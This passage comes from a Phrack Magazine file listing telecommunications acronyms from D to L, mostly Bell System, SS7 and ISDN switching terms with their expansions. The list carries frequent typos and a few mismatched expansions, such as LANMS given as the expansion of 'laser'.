of defense DOJ Department of justice DOM Data on master group DOTS Digital office timing supply DOV Data over voice DP Demarcation point DP Dial pulse DP Digital data-2 4 kb/s INTER/TRA blocal 1-26 DPA Different premises address DPA Dispatch DPA Distributed power architecture DPAC Dedicated plant assignment card DPAC Dedicated plant assignment center DPC Destination point code (SSY) DPCM Differential PCM DPE Data path extender DPGS Digital pair gain systems DPIDB Direct PIDB DPIDB Directly connected peripheral interface data bus DPLL Digital phase locked loop DPN Dip purge number DPN-PH Data packet network-packet handler DPNSS Digital private network signaling system (BT) DPP Discounted payback period DPP Distributed processing peripheral DPR Dip report and removal DPSK Differential phase shift keying DPSK Differential phased-shift keying DPT Data parameter testing DPT Department name DPU Digital patch unit DQ Digital data-4 8 kb/s INTER/TRA blocal 1-26 DQR Design quota system report DQS Design quota system DR Data ready DR Data receive DR Deactivate request (C/I channel code) DR Deactivation request DR Digital data-9.6 kb/s INTER/TRA blocal 1-26 DRAM Digital record announcement machine DRAM Dynamic ram DRCS Dynamically redefinable character sets DRHR Division of revenue hourly DRMU Digital remote measurement unit DRTLRT Dial repe tie lindal repeatie t DRU DACS remote unit DS Data set DS Digital carrier span DS Digital signal DS Direct signal DS-0 Digital signal 0 (one channel at 64 kb/s) DS-0A Digital signal at a subrate level on DS-0 for one customer DS-0B Digital signals at a subrate level on DS-0 facility for one or more CU DS-1 Digital signal level one DS0 Digital signal zer0 DSBAM Double-sideband amplitude module DSBLD Disabled (default). 
DSC Digital cross-connection systems DSC Digital subscriber controller AM79C3A DSCT Digital service copper transport DSDC Direct service dial capability DSI Digital speech interpolation DSIG Direct signaling DSK Disk DSL Digital subscriber line DSL Digital suscriber line DSLG digital subscriber line group (DSLG) DSLINIT DSL initialization. DSM Digital switching module DSMX (Ger) Digital signal multiplexer DSN Defense switched network/automatic voice network DSN Digital signal (level) n DSNE Double shelf network equipment frame DSNOFC DSN/AUTOVON office totals DSNTG DSN/AUTOVON trunk group DSP Digital signal processing DSP Digital signal processing or digital signal processor DSP Digital signal processor DSP Domain specific part (ISO 7498) DSR Data set ready DSR Display results DSR Dynamic service register DSRTP Digital service remote test port DSS Data station selector DST Destination of order response DSU Data service unit DSU Data servicing unit DSU Digital service unit DSU2 Diditalservice unit DSX Digital cross-connect DSX Digital signal cross-connect DT DI-group terminal DT Data through (C/I channel code in test mode) DT Data transmit DT Detect dial tone DT Due time DT1 Data form class 1 DTAC Digital access connector DTAC Digital test access connector DTAC Digital test access connector (links SMAS and SLC-96) DTAM Document transfer access and manipulation DTAS Digital test access system DTAU Digital test access unit DTC Data test center DTC Di-group terminal controller DTC Digital telephone controller (ARCOFI + IBC + ICC) DTC Digital trunk controller DTE Data terminal equipment DTE Print current date DTF Dial tone first (pay phone) DTG Direct trunk group DTIF Digital transmission interface frame DTM Data test module DTM Digital trunk module DTMF Dual-tone multifrequency DTR Data terminal ready DTRK Digital Trunks DTRK Digital trunks (line and trunk) DTU Di-group terminal unit DTU Digital test unit DU Data upstream (i.e. 
IOM2) DU Deactivation request upstream (C/I channel code) DUIH Direct user interface handler DUP Data user part DUP Duplicate DUR Duration DUV Data under voice DVA Design verified and assigned DVX Digital voice exchange DW Digital data-56 kb/s INTER/TRA blocal 1-26 DX Duplex DY Digital service (under 1 mb/s) INTER/TRA blocal 1-26 DYRECT Sides dynamic real time communication tester (in sitest) E E (receive) signal lead (moreover Ear part of E&M) E Equipment direction E Remote trunk arrangement position subsystem (rta/pss) from troubl E&M Receive & transmit/ear & mouth signaling E-COM Electronic computer originated mail E1 Equipment system E800 Enhanced 800 Service E911 Enhanced 911 EA Equal access end office EA Expedited data acknowledgement (SS7: in SCCP) EA Extended adress EA Switched acess INTER/TRA blocal 1-26 EAAT Equal access alternative technologies EADAS Engineering and administration data acquisition system EADAS/NM EADAS/network management EAEO Equial access end office EAI Emergency action interface EAP Equal access plan EARN European academic research network EAS Extended announcement system EAS Extended area service EASD Equal access service date EB Enfia ii end office trunk INTER/TRA blocal 1-26 EBAC Equipmentc billing accuracy control EBCDIC Extended binary coded decimal interexchange code EBSP EBS prefix translations EBSP Enhanced business services prefix translations EC ESS entity and control group number EC Echo canceller EC Enfia ii tandem trunk INTER/TRA blocal 1-26 EC Environment code EC European community EC Exchange carriers ECAP Electronic customer access program ECC Enter cable change ECCS Economic c (hundred) call seconds ECD Equipment configuration database ECDMAN Equipment configuration database manager ECF Enhanced connectivity facility ECL Emitter coupled logic ECMA European computer manufactueres association ECPT Electronic coin public telephone ECR Exchange carrier relations ECS Electronic crosconnect system ECS Equipment class of 
service ED Enter date EDAC Electromechanical digital adapter circuit EDD Envelope delay distortion EDI Electronic data interchange EDP Electronic data processing EDSC Electronic directory customer counts (ISDN BRCS) EDSX Electronic digital signal x-connect EDZ Facility emergency assignment list EE Combined access INTER/TRA blocal 1-26 EE Initials of supervisor reviewing this ticket. EEC Electronic equipment cabinet EECT End-to-end call trace EEDP Expanded electronic tandem switching dialing plan EEE Electronic equipment enclosures EEHO Either end hop off EEI Equipment-to-equipment interface EEPROM Electrically erasable programmable read only memory EF Entrance facility-voice grade INTER/TRA blocal 1-26 EFCTS Electronic custom telephone service EFRAP Exchange feeder route analysis program EG Type #2 telegraph INTER/TRA blocal 1-26 EIA Electronic industries association EIS Expanded inband signaling EISS Economic impact study system EIU Extended interface unit EIn Error indication n (C/I channel code) EKTS Electonic key telephone service EKTS Electronic key telephone sets EL Emergency reporting line INTER/TRA blocal 1-26 ELA Entity load analysis ELDS Exchange line data service ELECL Electrical ELEMNTS Elements ELI Electrical line interface EM Emergency reporting center trunk INTER/TRA blocal 1-26 EM Encription module EM End of medium (ASCII control) EMC Electromagnetic capability EMC Electromagnetic compatibility EME Electromagnetic emission EMI Electromagnetic interference EML Expected measured loss EMM Expandable mos memory EMS Electromagnetic susceptibility EMS Expanded memory specification EMSCC Electromechanical switching control center EMV EMC (german) EN Entity EN Entity number EN Exchange network acess facility INTER/TRA blocal 1-26 ENABL Enable ENFIA Exchange network facility for interstate access ENHMT Enhancement ENQ Enquiry ENTDT Entered date and/or time EO End office EOC Embedded operation channel EOE Electronic order exchange EOM End of message EOS 
Extended operating system EOTT End office toll trunking EP Entrance facility-program grade INTER/TRA blocal 1-26 EP Expedited data (SS7: in SCCP) EPIC Extended PIC EPL Electronic switching system program language EPROM Erasable programmable read-only memory EPSCS Enhanced private switched communication service EQ Equalizer EQ Equipment only-(network only) assignment INTER/TRA blocal 1-26 EQPT Equipment ER Enhancement request ER Error register ER Exception report ERAR Error return address register ERC Error control (IOS) EREP Environmental recording editing and printing ERF Emergency restoration facility ERL Echo return loss ERP Effective radiated power ERPMP Exception report pumper ERR Error ERRS Errors ERTS Error rate test set ERTS Error rate test sets ERU Error return address update ES Extension service-voice grade INTER/TRA blocal 1-26 ESAC Electronic systems assistance center ESAP Emergency Stand-Alone prefix ESAP Emergency stand-alone prefix ESB Emergency service bureau ESC Enhanced speech circuit ESC Escape (ASCII control) ESC Three way calling USOC ESCC2 Extended high level serial communication controller ESCC8 Like ESCC2 ESD Electrostatic discharge ESD Extened super framing ESF Extended super frame ESF Speed calling USOC ESFF Extended superframe format ESL Emergency stand-alone ESL Essental service ESL Speed calling 8 code USOC ESM Call forwarding USOC ESM Economic study module ESMTC Electronic system maintance ESN Electronic serial number (Cell) ESN Electronic switched network ESN Emergency service number ESP Enhanced service procider ESP Enhanced service providers ESP Essential service protection ESP Print entire summary table ESS Electronic switching system ESSX Electronic switching systen exchange EST Established ESTAB Establish ESX Call waiting USOC ET Entrance facility-telegraph grade INTER/TRA blocal 1-26 ET Exchange termination ETAS Emergency technical assistance ETB End of transmission block ETC Estimated trunk ccs value ETF Electronic toll fraud 
ETL Equipment test list ETN Electronic tandem network ETRI Electronics and telecommunications research institute (ROK) ETS Electronic tandem switching ETS Electronic translation systems ETSACI Electronic tandem switching adminstration channel interface ETSSP ETS status panel ETX End of text EU End user EU Extension service-telegrasph grade INTER/TRA blocal 1-26 EUPOT End user-point of termination EV Enhanced emergency reporting trunk INTER/TRA blocal 1-26 EV Expected value EVB Busy call forward USOC EVC Bust call forward extended USOC EVD Delayed call forward USOC EVD Delayed call forwarding EVST (Ger) End exchange EW Off network MTS/WATS equivalent service INTER/TRA blocal 1-26 EWSD (Ger) Electronic dialing system (digital) EX Exercise EXD ECS crossloading option EXD Extra digit EXD Extra digit (MDII) EXP Extra pulse EXP Extra pulse (MDII) EXT Extension EXTC Expenditure type code F Facility direction F Fault (indicator) F Office or base unit from trouble report. F1 Facility system FA Frame aligner FA Fuse alarm FAA Facility accepted (SS7 in ISUP) FAC Facility FAC Facility Assiment Center FACD Facility changed msg. 
FACS Facilities assignment and control system FADS Dorce administration FANALM Fan alarm FAP Facilities analysis plan FAR Facility request (SS7: in ISUP) FAR Federal acquisition regulation FAS Frame alignment signal FAST First application system test FAT File allocation table FAX Faximile FC Feature control FC Frame control FC From cable FC/EC Function code and environment code FCA Final closure abandon (MDII) FCAP Facility capacity FCC Federal communications commission FCC Forward command channel FCC Frame control center FCD Frame comtinuity date FCG False cross or ground FCS File control systemction FCS Frame check sequence FD Private line-data INTER/TRA blocal 1-26 FDD Frame due date FDDI Fiber distributed data interface (x3t9.5) FDI Feeder/distribution interfaces FDM Frequency division multiplex FDM Frequency-division multiplexing FDMA FDM access FDP Field development program FDT Frame due time FDX Full duplex FDY Set fiscal day for LAC FEA Custom calling feature/PIC FEA Customer feature FEAT Feature FEAT Features FEBE Far end block error (IOM2 monitor message) FEC Forward error correction FECC Front end communication computer FED Far end data FELP Far end loop process FEMF Foreign electro-motive force FEPS Facility and equipment planning system FEV Far end voice FF Check appropriate space where trouble is located FF Form feed FG Group-supergroup spectrum INTER/TRA blocal 1-26 FGA Feature group A FGB Feature group B FGC Feature group C FGD Feature group D FGE Feature group E FGK Feature group K (ISDN Q.931) FIB Forward indication bit (SS7) FID Field indentifiers FIFO First in FIFO First in first out (storage) FIL Filter FIN Facility information msg. 
FIOC Frame input/output controller FIP Facility interface processor FIPS Federal information processing standards FISU Fill in signal unit (SS7) FITL Fiber in the loop FJ Frame jump (C/I channel code) FKP False key pulse FKP False key pulse (MDII) FL Fault locate FL Fault location FLA Flag FLD Field FLEXCOM Fiber optic communication FLR Frame layout report FLT Flat FM Frequency modulation FM01 DCT alarm activated or retired - 1AESS FM02 Possible failure of entire bank not just frame - 1A FM03 Error rate of specified digroup - 1AESS FM04 Digroup out of frame more than indicated - 1AESS FM05 Operation or release of the loop terminal relay-1AESS FM06 Result of digroup circuit diagnostics -1AESS FM07 Carrier group alarm status of specific group - 1AESS FM08 Carrier group alarm count for digroup - 1AESS FM09 Hourly report of carrier group alarms - 1AESS FM10 Public switched digital capacity failure - 1AESS FM11 PUC counts of carrier group errors - 1AESS FMAC Facility maintance administration center FMAC Facility maintenance and control FMC Force management center FMM Finite message machine FN Feature number FN File name FNBE Far and near end block error (IOM2 monitor message) FNPA Foreign numbering plan area FOA First office application FOC Fiber optic communications FON Fiber optics network FOR Frame order report FORPOT Foreign potential. FOS Frame operations summary FOS-ALC Fiber optic systems maintance - Alcatel FOS-ROCK Fiber optic system maintance - Rockwell FOT Forward transfer (SS7: in ISUP) FP Functional protocol FPC Foundation peripheral controller FPC Frequency comparison pilots FPS Fast packet switching FR Fire dispatch INTER/TRA blocal 1-26 FR Fixed resistance FR Flat rate FRAC Frame aligner circuit FRC Forced request configuration FREQ Frequency FRJ Facility rejected msg. 
(SS7 in ISUP) FRMR Frame reject (LAP-D response) FRPS Field reliability performance studies FRQ Facility request message FRS Flexible route selection FS File separator FS/SYM Function Schematic/Symbol Numbers (1AESS Test access) FSA False start abandon FSA False start abandon on incoming trunk FSC Frame synchronization clock (i.e. IOM2) FSK Frequency shift keying FSN Forward sequence number FT Foreign exchange trunk INTER/TRA blocal 1-26 FT Frame time FTA Frame transfer analysis FTC Frame transfer completion FTE Frame transfer establishment FTG Final trunk group FTL Frame transfer lets FTP File transfer protocol FTR Frame transfer reprint FTS Federal telecommunications system FTW Frame transfer withdrawal FUNCS Functions FV Voice grade facility INTER/TRA blocal 1-26 FW Wideband channel INTER/TRA blocal 1-26 FWD Forward FWM Frame work management FWS Frame work station FX Foreign exchange FX Foreign exchange INTER/TRA blocal 1-26 FXO Foreign exchange circuit office direction FXS Foreign exchange circuit station direction G Spare box. use for special studies. GAP (Ec) group of analysis and provision (for ONP) GB Great britain GBS Group bridging service GC Group card GCE Gated Oscillator Error GCI General circuit interface (IOM/u(k0)-interface) GCON Generic conditions GCP Generate Control pulse GCR General configuration register GCS Group control system GDSUCOM Global DSU common GDSUCOM Global digital service unit common GDX Gated diode crosspoint GDXACC Gated diode crosspoint access GDXC Gated diode crosspoint compensator GDXCON Gated diode crosspoint control circuit GEISCO General electric information services company GFR General facility report GG Getails of reported trouble. 
GH Gain hit GHZ Gigahertz GID Group ID GKCCR Generated key collection and compression routine GLA Generate lists for assignment GND Ground GNS Gainslope GNS Gainslope test (SARTS command) GOC General order control (TIRKS) GOS Grade of service GP Group processor GPA Gas pressure alarm GPIB General purpose interface bus GPPC General purpose power controller GPS Global positioning system GR General requirments (BellCoRe) GRA GRS acknowledgement GRASP Generic access package GRD Ground fault. GRD Ground. GRID Line unit grid. GRP Group GRP MOD Group modulator GRS Circuit group reset (SS7: in ISUP) GS Ground start (on-hook normal) GS Group separator GSA General services administration GSAT General telephone and electronics satellite corporation GST Ground start signaling GSZ Group size GTC General telephone company GTE General telephone electronics GTEI Global tei GTS Gamma transfer service GTT Global title transmission GWY Gateway Ger German H Hold state (in EOC) H Hours H Trouble ticket number. subparagraph 5.6.4. H&D High and dry (trunk test) H- High- H-RAP Hardware reliability assurance program HAC Hands-free add-on circuit (for speakerphone) HBS Hunt group blocks of spares HC High capacity 1.544 mb/ps-service code for LATA access HC Hunt count HCDS High capacity digital service HCDS High-capacity digital services HCFE High-capacity front end HCSDS High-capacity satellite digital service HCTDS High-capacity terrestrial digital service HD High capacity 3.152 mb/ps-service code for LATA access HDB3 High-density bipolar 3 (cept PRI) HDFI HSM digital facilities interface HDLC High level DLC HDLC High-level data link control HDSL High bit-rate digital subscriber line HDTV High definition television (soon to be the new buzz word!!) 
HDW Hardware HDX Half duplex HE High capacity 6.312 mb/ps-service code for LATA access HEAP Home energy assistance program HEHO High end hop off HF High capacity 6.312-service code for LATA access HF Hunt-from telephone number HFCC High capacity facility control center HFR Hardwara failure rate HG High capacity 274.176 mb/s-service code for LATA access HGBAF Hardware group blocking acknowledgment failure HGR Hunt group report HGS Hunt group summary HGUAF Hardware group unblocking acknowledgment failure HH History header HH Record of repair activity. HI High HI High impedance (C/I channel code) HI Highway interrupt HIC Hybrid integrated circuit HIM Host interface module HIS Hunting ISH HK Hook HL IT Siemens semiconductors (hl) HLC Highest lead factor group count HLDG Holding HLLAPI High level language application program interface HLSC High-level service circuits HM1 Intercom plus USOC HMCL Host message class assignment HMP Intercom plus HNPA Home numbering plan area HNS Hospitality network service HOBIC Hotel billing information center HOBIS Hotel billing information system HOLD Call hold (i.253 b) HP Hewlett-packard HP Non-DDS digital data 2.4 kb/s INTER/TRA blocal 1-26 HPO High performance option HQ Non-DDS digital data 4.8 kb/s INTER/TRA blocal 1-26 HR Hour HR Non-DDS digital data 9.6 kb/s INTER/TRA blocal 1-26 HRS Hours prefix HS High capacity subrate-service code for LATA access HSCC High level serial communication controller sab82520 HSCX Extended hscc sab82525 HSM Host switching module HSSDS High-speed switched digital service HT Horizontal tabulator HT Hunt-to telephone number HTI Highway transfer interrupt HU High usage HU High-usage trunk HUNT Hunting HUTG High usage trunk group HW High and wet. 
HW High-and-wet HW Non-DDS digital data 56 kb/s INTER/TRA blocal 1-26 HW Pcm highway HZ Hertz I Cable and pair or associated equipment I Information (LAP-D command) I Installation I Invalid I&I Investment and inventory I&M Customer services installation and maintenance I&M Installation & maintenance I- Information (numbered i-frames) I/O Ineffective other I/O Input/output devices I/O Input/output I0 Feature removed I1 Added feature IA Immediate action IA Ineffective attempts IAA Ineffective attempt analysis. IAAN Immediate action report IAC0 DLI 0 access error IAC1 DLI 1 access error IACS Integrated access cross-connected system IAD Incomplete address detected (incoming) IAM Initial address msg. (SS7: in ISUP) IB Instruction buffer IBC ISDN burst transceiver circuit IBN Integrated business network IBROFC ISDN BRCS and Analog Office totals IC Incoming call (x.25) IC Independent carrier IC Installation centers IC Inter-LATA carrier IC Inter-exchange carrier IC Interexchange carriers IC/MC Installation and maintenance centers ICA Incoming advance ICA Incoming advance (MDII) ICAN Individual circuit analysis ICAO International civil aviation organization ICC ISDN communications controller ICC Interstate commerce commission ICCU Inmate call control unit ICD Interactive call distribution ICL Intra-RSM communication link ICLID Individual calling line id ICM Integrated call management ICN Interconnecting network ICOM (taiwan) integrated communication ICOT Intercity and outstate trunk ICP Intercept ICPOT Interexchange carrier-point of termination ICSC Inter-LATA customer service center ICSC Interexchange carrier service center ICSC Interexchange customer service center ICUG International closed user groups ICUP Individual circuit usage and peg count ICUR Individual circuit usage recorder ID Idle control code IDA (gb) integrated digital access (b64+b8+d8) IDC Information distribution companies IDCI Interim defined central office interface IDCU Integrated digital carrier unit 
IDCU Integrated digital carrier unit.
IDCU Integrated digital carrier unit i.e. AT&T Series 5 RT FP 303G
IDDD International direct distance dialing
IDEC ISDN d-channel exchange controller
IDF Intermediate distributing frame
IDI Initial domain identifier (ISO 7498)
IDLC Integrated digital loop carrier
IDP Individual dialing plan
IDPC Integrated data protocol controller
IDS Internal directory system
IDVC Integrated data/voice channel
IEC ISDN echo cancellation circuit
IEC Interexchange carrier
IEC International electrotechnical commission
IEC-P (old name of iec-q3)
IEC-Q1 Iec for 2b1q peb2091
IEC-Q2 Iec-q specially for lt and NT1 (without microprocessor)
IEC-Q3 Iec-q with parallel processor interface (i.e. for daml)
IEC-T Iec for 4b3t peb2090
IEEE Institute of electrical and electronics engineers
IEPC ISDN exchange power controller
IF Intermediate frequency
IFAC Integrated digital carrier unit facility
IFRB International frequency registration board
IFRPS Intercity facility relief planning system
IFS (switzerland) integrated telecom service
IGS Identify graphic subrepertoire (teletex)
IIN Integrated information network
IJR Input a jeopardy reason
ILC ISDN link controller
ILINE IDCU line counts.
IM Input mux
IM Interface module
IMA Additional ineffective machine attempts
IMAS Integrated mass announcement system
IMC IOS mailbox control
IMCAT Input message catalog
IMCF Interoffice multiple call forwarding
IMD Intermodulation distortion
IMM Input message manual
IMMU IOS memory management unit
IMP Impedance
IMP Impulses per minute
IMP Interpersonal messaging protocol (x.420: p2)
IMS Interprocessor message switch
IMT Inter-machine trunk
IMTS Improved mobile telephone service
IMU Input measured ccs usage data
IN Intelligent network
IN/1 Intelligent network/1
INA Integrated network access
INAP Intelligent network access point
INC Incoming trunk groups
INC International calling
INC International carrier
INC SEL Incoming selector
INCAS-A Integrated network cost analysis - access
INCAS-LT Integrated network cost analysis - local and toll
INCAS-S Integrated network cost analysis - shared
INCAS/E Integrated network cost analysis system
INCAS/I Integrated network cost analysis system - embedded
INCIS Integrated network cost information system
INCP Incomplete
IND Individual
INF Information
INF Information (SS7: in ISUP)
INIT Allocation table initialization
INL Inter node link
INN Inter node network
INQ Complete circuit inquiry
INR Information request (SS7: in ISUP)
INS (japan) information network system (b64+b16+d8)
INT Interrupt (i.e. C/I channel code)
INTCCTRL International code control (NTI)
INTCHG Interexchange
INTEGRIS Integrated results information service
INTELSAT International telecommunications satellite consortium
INTR Interrupt
INW INWATS [code 258(8000-8299)]
INWATS Inward wide area telecommunications system
INWATS Inward wide area telephone service
INWBLKD INWATS returned blocked
INWBLKD Inward wide area telecommunications service (INWATS) returned blocked
INWBUSY INWATS all lines busy
INWCCBL INWATS code control blocked
INWDBOV INWATS data base overload
INWDBTO INWATS data base timeout
INWDSBL INWATS direct signaling blocked
INWNNPA INWATS nonpurchased NPA
INWNNPA INWATS nonpurchased numbering plan area (NPA)
INWNOXL INWATS returned no translation
INWONPA INWATS invalid ONPA
INWONPA INWATS invalid originating numbering plan area (ONPA)
INWOVLD INWATS returned overload
INWUNEQ INWATS returned unequipped
INWVLIN INWATS vacant line number
INWVNXX INWATS vacant NXX
IO Inward operator
IOAU Input/output access unit (univac)
IOC Independent operating company
IOC Input/output controller (shelf)
IOC Integrated optical circuit
IOC International overseas center
IOCC International overseas completion center
IOCP Input/output configuration process
IOCS Input/output control system
IODB IDCU on-demand B-channel
IOI Secondary input/output interface pack(s)
IOM ISDN-oriented modular (architecture and interfaces)
IOM2 Extended iom
IOMI Input/output microprocessor interface
IOP Input-output processor
IOP Input/output Processor
IOP Input/output driver
IOP Input/output processor
IOS ISDN operational software
IOS Input/output supervisor (IBM)
IOS Inventory order system
IOSF Input/output shelf assignment
IOT Inter-office trunk
IOT Interoffice test command (SARTS command)
IOT Interoffice testing
IOTC International originating toll center
IP Information provider
IP Inprogress
IP Intermediate point
IP Internet protocol
IPABX ISDN pabx
IPAC ISDN pc adapter circuit
IPACS Interactive planning & control system
IPAT ISDN primary access transceiver
IPB Sipb
IPBC IOM2 PBC (old name for EPIC)
IPC Inter-process communication
IPC Interprocess communication
IPCS IOS process control system
IPCS Installation product costing system
IPCS Interactive problem control system
IPIB Intelligent personal computer interface board
IPIDB IDCU peripheral interface data bus
IPL Initial program load
IPL Interoffice private line signaling
IPL Interoffice private line signaling test (SARTS command)
IPLAN Integrated planning and analysis system
IPLS InterLATA private line services
IPM Impulse per minute
IPM Impulses per minute
IPM Interruptions per minute
IPP IOS protocol part
IPP Integrated planning process
IPPC Interdepartmental project planning committee
IPR Installation performance results system
IPS Installation performance results
IPS Integrated Provisioning System
IPS Integrated provisions system
IPX Integrated packet exchange
IQS Instant request system
IR Incoming register
IRBR Integrated resource billing report system
IRC International record carrier
IRIS Industry relations information system
IRLF Incoming register link frame
IRM Information resource management
IRMC Incoming register marker connector
IRO Industry relations operations
IROR Internal rate of return
IRP Integrated revenue planning
IRPC ISDN remote power control psb2120
IRR Internal rate of return system
IRRS Interactive request and retrieval system
IRS Industrial revenue summary
IRT IDCU remote digital terminal
IRU Integrated recovery utility (sperry)
IS Interrupt set
IS/SADQ Interstate special access demand quantification
ISA Indicate status application
ISAC-P ISDN subscriber access controller
ISAC-S ISDN subscriber access controller
ISAM Indexed sequential access method
ISC Intelligent serial controller
ISC International switching center
ISC Planintercompany services coordination plan
ISC/TE Information systems center for technical education
ISCAR Information systems costs analysis reports
ISCOM SWBT intercompany service coordination (ISC) order monitor
ISCP Integrated service control point
ISCP/MSAP ISCP/multi-service application platform
ISCP/SPOCK ISCP/service provisioning and on-line creation tool kit software
ISDN Integrated services digital network
ISF Inquire on a single facility
ISG Isolated system grounding
ISH Complete circuit inquiry short
ISI Industry support layout
ISIS Interstate settlements information system
ISLM Integrated services line module
ISLU Integrated services line unit
ISLUCC Integrated services line unit common controller
ISLUCD Integrated services line unit common data
ISLUHLSC Integrated services line unit high level service circuit
ISLUMAN Integrated services line unit metallic access network
ISLURG Integrated services line unit ringing generator
ISM ISDN switching module
ISM Interactive synchronous mode
ISMP Industry specific measurement plan
ISMS Integrated service management system
ISMTL Information systems management training
ISN Information systems network
ISN Integrated systems network
ISNET Interim solution network (Kansas city only)
ISO Information systems organization
ISO International organization for standardization
ISOFC ISDN office totals
ISOPDB Information systems organization planning data base
ISOSS Intercompany service order switching system
ISP Intermediate service part
ISPBX Integrated systems PBX
ISPC International signaling point code (SS7)
ISPF Interactive system productivity facility
ISPI ISDN packet interface
ISRP Information systems rules panel
ISS Integrated switching system
ISS Issue
ISSANRC Interstate special access non-recurring
ISSC Interfunction special service coordination
ISSCO Intertoll
ISSN Integrated special services network
ISSS ISDN supporting system
ISTA Interrupt status register
ISUP ISDN user part
ISUP ISDN user part (SS7: q.76x)
ISUP Integrated services user part
IT Inactivity test (SS7: in SCCP)
IT Intertandem tie trunk INTER/TRA blocal 1-26
ITAC ISDN terminal adaptor circuit
ITC Independent telephone company
ITC Interdepartmental training center at dallas-texas for
ITD Intertoll dial
ITEA Interoffice trunks engineering and administration
ITF Integrated test facility
ITG Integrated traffic generator
ITIMS Integrated transportation information management system
ITIMS/IE Itims/information expert
ITM Cable pair item number
ITNA Improves third number acceptance
ITNO Item number
ITS Institute of telecommunication science
ITS Integrated test system
ITS Interactive training system
ITSE Incoming trunk service evaluation
ITSO Incoming trunk service observation
ITSTC Information technology steering committee (cen
ITT Idle trunk test
ITU International telecommunication union
ITU International telecommunications union
ITVSE Intermediary transport vendor service center
ITW Instructional technology workshop
IU Network/port interface unit
IUP Installed user program (IBM)
IVD Integrated voice data
IVP Installation verification procedures
IVP Installation verification program
IVTS International video teleconferencing service
IWF Interworking facility (gateway)
IWU Interworking unit (gateway)
IX Interactive executive
IXC Or icinterexchange carrier
IXM Interexchange mileage
IZ Interzone

==Phrack Magazine==
Volume Four, Issue Forty-Three, File 23 of 27
{Acronyms Part III}

J Enter centrex (CTX) or multiline hunt group (MLHG) number
JAD Joint application design
JAM Jumper activity management
JCL Job control language
JDC Japan digital cellular
JDC Job duties code
JDI Job disposition indicator
JDIP Jmos/dopac interface process (comptroller system)
JE Job evaluation
JEC Journal entity code
JES Job entry subsystem (IBM)
JES Job entry system
JES 2 Job entry system 2 (IBM)
JES 3 Job entry system 3 (IBM)
JET BTL TIRKS jumper evaluation technique
JFC Job function code
JGF Junctor grouping frame
JIB Job information block (VMS)
JIM Job information memorandum
JIS Jurisdictional interstate services
JK Jack
JKLAP Jack/key/and lamp access panel
JL Jumper length
JMOS Job management operations system
JMOS/PT JMOS/pricer-tracker
JMOS/RPTS JMOS reports
JMOSCA Jmos contract administration
JMX Jumbogroup multiplex
JOSS Job order status system (distribution services system)
JOSSVM Job order status system/VM
JOVIAL Jule's own version of the international algebraic language
JP71 Joint practice 71
JP80 Joint practice 80
JPH Jumper placement history
JSC Job status code
JSN Junction switch number
JSW Junctor switch
JTR Jitter
JTRS JMOS trouble reporting system (distribution services system)
JUICE JMOS user input card entry (distribution services system)
K DACS-SRDC
K Equipment frame designation
K Kilobit
KBPS Kilobits per second
KCA Key contributor award
KCO Keep cost order
KD Keyboard display
KDROP Key display receive only printer
KDT Keyboard display terminal
KERMIT Kermit
KEY Stop hunt or random make busy hunting
KFT Kilofeet
KHZ Kilo-hertz
KHZ Kilohertz
KITSKOTS Kansas inward toll service/Kansas outward toll service
KOHM Kilohms
KOP Thousands of operations per second
KP Key pulse
KPR Killer pair report
KSDS Key sequence data set (IBM)
KSM Create a transaction mask
KSR Keyboard send-receive
KSU Key service unit
KTA Korea telecommunication authority (ROK)
KTS Key telephone set
KTS Key telephone system
KW Keyword
L Shift preference (if any) for this work to be performed.
L/AOS Legal/advanced office system
L2DOWN Level 2 is inoperable.
L2QLTY Poor level 2 transmission quality.
L3-ERC Layer 3 error control (IOS)
L3M Layer 3 mgr. (IOS)
LA Local area data channel INTER/TRA blocal 1-26
LA Loop assignment
LAC LAN application controller
LAC Loop assignment center
LAD Label definition
LAD Loop activity data
LADS Local area data service
LADT Local access data transport
LADT Local area data transport
LAI Line equipment assignment inquiry
LAIS Local automatic intercept system
LAJMS Ledger and journal maintenance system
LAMA Local automatic message accounting
LAMA-C Computerized local AMA for No. 5 crossbar
LAN Local area network
LANMS Light amplified by stimulated emission of radiation
LAP Link access protocol
LAPB (LAP-B) link access procedure of balanced mode
LAPD (LAP-D) link access procedure of D-channels
LAPD Link access procedure on the D channel
LAPM (LAP-M) link access protocol for modems
LAPX Lapb extended (t.71)
LARG Lidb access routing guide
LASS Local alarm scanning system
LASS Local area signaling service
LAT Local access terminal (RMS-D1)
LATA Local access and transport area
LATA Local access and transport areas
LATA Local access transport area
LATIS Loop activity tracking information system
LATIS I/F Loop activity tracking information system interface
LATIS/INPUT Locally developed program used to input to the latis system
LB Voice-non switched line-service code for LATA access
LBBD Loopback B1
LBI Load balance index
LBK Loop test (SARTS command)
LBK Loopback
LBL Online tape label printing
LBNCGI LIDB BNS message with call gapping indicator present
LBNGM LIDB BNS garbled message
LBNMGM LIDB BNS return value missing group or misrouted
LBNNAN LIDB BNS return value no translation for an address of such nature
LBNNCG LIDB BNS return value network congestion
LBNNFL LIDB BNS return value network failure
LBNNPG LIDB BNS return value nonparticipating group
LBNNSA LIDB BNS return value no translation for this specific address
LBNREJ LIDB BNS reject message received
LBNSCG LIDB BNS return value subsystem congestion
LBNSFL LIDB BNS return value subsystem failure
LBNTO LIDB BNS message missed because of timeout
LBNUP LIDB BNS message with unexpected reply
LBNUUR LIDB BNS return value unequipped user
LBO Line buildout
LBP Load balance parameters
LBR Large business remote
LBRV Low bit rate voice
LBS Land and building system
LBS Load balance system
LBS Load balance system (BTL) module of tnds
LBST Loopback device signature table
LBU Loopback devices signature table
LBU Loopback unit
LBn Loopback channel bn request (command in IOM2 monitor and EOC)
LC Line card
LC Line count
LC Output line count
LC Pending service order count
LC Voice-switched line-service code for LATA access
LCAMOS Loop cable administration and maintenance operations system (predictor)
LCC Line class code
LCCIS Local common channel interoffice signaling
LCCL Line card cable
LCCLN Line card cable narrative
LCD List cable summary
LCDCGI LIDB CCRD message with call gapping indicator present
LCDGM LIDB CCRD garbled message
LCDMGM LIDB CCRD return value missing group or misrouted
LCDN Last called directory number
LCDNAN LIDB CCRD return value no translation for an address of such nature
LCDNCG LIDB CCRD return value network congestion
LCDNFL LIDB CCRD return value network failure
LCDNPG LIDB CCRD return value nonparticipating group
LCDNSA LIDB CCRD return value no translation for this specific address
LCDR Local call detail recording
LCDREJ LIDB CCRD reject message received
LCDSCG LIDB CCRD return value subsystem congestion
LCDSFL LIDB CCRD return value subsystem failure
LCDTO LIDB CCRD message missed because of timeout
LCDUP LIDB CCRD message with unexpected reply
LCDUUR LIDB CCRD return value unequipped user
LCE Line concentrating equipment frame
LCEN Line card equipment number
LCI LAN CPU interface
